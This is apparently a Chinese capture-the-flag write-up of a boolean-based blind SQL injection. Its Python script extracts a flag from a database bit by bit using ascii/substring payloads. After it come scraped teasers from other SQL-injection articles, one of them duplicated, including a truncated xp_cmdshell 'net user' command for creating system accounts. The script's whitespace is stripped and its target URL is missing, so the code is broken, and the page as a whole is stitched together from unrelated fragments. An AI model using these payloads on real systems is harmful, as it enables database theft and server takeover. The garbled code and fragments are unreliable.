進去輸入1觀察發現:
2,3都只有乙個結果hello!,我們輸入4觀察一下
發現空白,於是輸入sql注入語句:1' and '1'='1
沒有報錯,也有顯示hello!於是判斷出,該題目沒有過濾,只能用基於hello!回顯的sql注入
猜測資料庫,資料表,字段這些我就不浪費時間寫了,有想要了解的道友,可以自行百度,或留言交流,我這裡直接寫爆破flag表flag欄位的**就好了
**如下:
#!/usr/bin/python
#coding=utf-8
#author=one
importrequests
defmain():
n=0binary=""
flag=""
foriinrange(1,1000):
forjinrange(8):
url="'and1=if((ascii(substring((selectflagfromflag),"+str(i)+",1))%26"+str(2**j)+")="+str(2**j)+",1,0)%23"
request=requests.get(url)
if(request.text.find('hello!')!=-1):
binary='1'+binary
n=0else:
binary='0'+binary
n+=1
printchr(int(binary,2)),
flag+=chr(int(binary,2))
binary=""
if(n>=8):
print"\n"+flag
break
if__name__=='__main__':
main()
#上述**使用的是按位與方法,比普通迴圈遍歷所有可能字元要快,比較8次必得乙個字元結果
即可爆破出結果:
簡單SQL注入
sql注入思路 找注入點 判斷是否為注入點 猜表名 猜欄位名 爆出字段內容 那麼何為注入點?有引數進行資料庫傳遞的都可判為注入點。以此url為例 xx.xx show.asp?id 1 其中id即為引數,如果此url用sql語句來表示的話 則向資料庫中進行查詢的語句為 select from sho...
SQL注入詳解 6
高 級 篇 第一節 利用系統表注入sqlserver 資料庫 sqlserver 是乙個功能強大的資料庫系統,與作業系統也有緊密的聯絡,這給開發者帶來了很大的方便,但另一方面,也為注入者提供了乙個跳板,我們先來看看幾個具體的例子 master.xp cmdshell net user name pa...
SQL注入詳解 6
高 級 篇 第一節 利用系統表注入sqlserver 資料庫 sqlserver 是乙個功能強大的資料庫系統,與作業系統也有緊密的聯絡,這給開發者帶來了很大的方便,但另一方面,也為注入者提供了乙個跳板,我們先來看看幾個具體的例子 master.xp cmdshell net user name pa...